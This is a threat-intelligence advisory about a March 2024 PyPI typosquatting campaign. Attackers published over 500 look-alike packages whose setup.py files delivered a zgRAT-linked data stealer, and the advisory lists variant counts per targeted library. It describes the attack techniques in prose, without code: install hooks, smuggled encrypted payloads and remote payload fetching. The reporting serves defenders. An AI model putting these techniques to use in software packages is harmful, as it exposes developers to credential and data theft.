Typosquatting Campaign Targets Python Developers with Hundreds of Malicious Libraries

An automated typosquatting attack campaign targeted popular Python libraries hosted on the Python Package Index (PyPI) page.

Executive Summary

Security firm Phylum has discovered and reported an automated typosquatting attack campaign recently detected on March 26, 2024, which targeted popular Python libraries hosted on the Python Package Index (PyPI) page. Attackers deployed over 500 typosquatted variations of well-known libraries like TensorFlow, BeautifulSoup, requests, requirements, and others. These variations were designed to mimic legitimate package names but contained malicious code in their setup.py files linked to the malware family known as zgRAT.

Community Threat Assessment

Due to the temporary suspension of new projects and creations by the PyPI Development Team, the RH-ISAC Intelligence Team assesses with high confidence that this campaign presents a relatively medium threat for organizations in the retail and hospitality sector. RH-ISAC recommends Core Members review the intelligence included in this report and the linked Phylum report, which contains additional details regarding the campaign.

Technical Details

According to latest reporting from Phylum, the attack began with experimentation on a package called schubismomv3, where the attackers tested malware deployment techniques. The attackers initially experimented with install hooks and later shifted to smuggling encrypted payloads into local files for execution. Despite variations in setup.py files, the payload remained consistent, primarily functioning as a data stealer linked to zgRAT. Following the schubismomv3 experiment, the attackers then published insanepackagev1414, which differed by pulling a smaller payload from a remote URL instead of embedding it entirely into the setup file, which allowed for quicker deployment of variations under different package names. This ability to scale faster under different names enabled attacks to launch a wide-scale typosquatting campaign targeting PyPI.

The typosquatting attack commenced around 15:06 UTC on March 26, 2024, with variations targeting different libraries. After a brief pause, the attack resumed the next day with additional variations. In total, 566 typosquat publications were identified. PyPI promptly removed these packages, and to prevent further attacks, they temporarily suspended new project creation and new user registration. According to the status page, the incident has since been “resolved“.

Typosquat Variations

The following typosquat variations were launched by attackers:

36 variations of requests

61 variations of py-cord

35 variations of colorama

36 variations of capmonstercloudclient

20 variations of pillow

24 variations of bip-utils

29 variations of tensorflow

26 variations of BeautifulSoup

26 variations of PyGame

15 variations of SimpleJson

38 variations of Matplotlib

26 variations of PyTorch

67 variations of CustomTKInter

28 variations of selenium

17 variations of playwright

15 variations of asyncio

67 variations of requirements

More Recent Blog Posts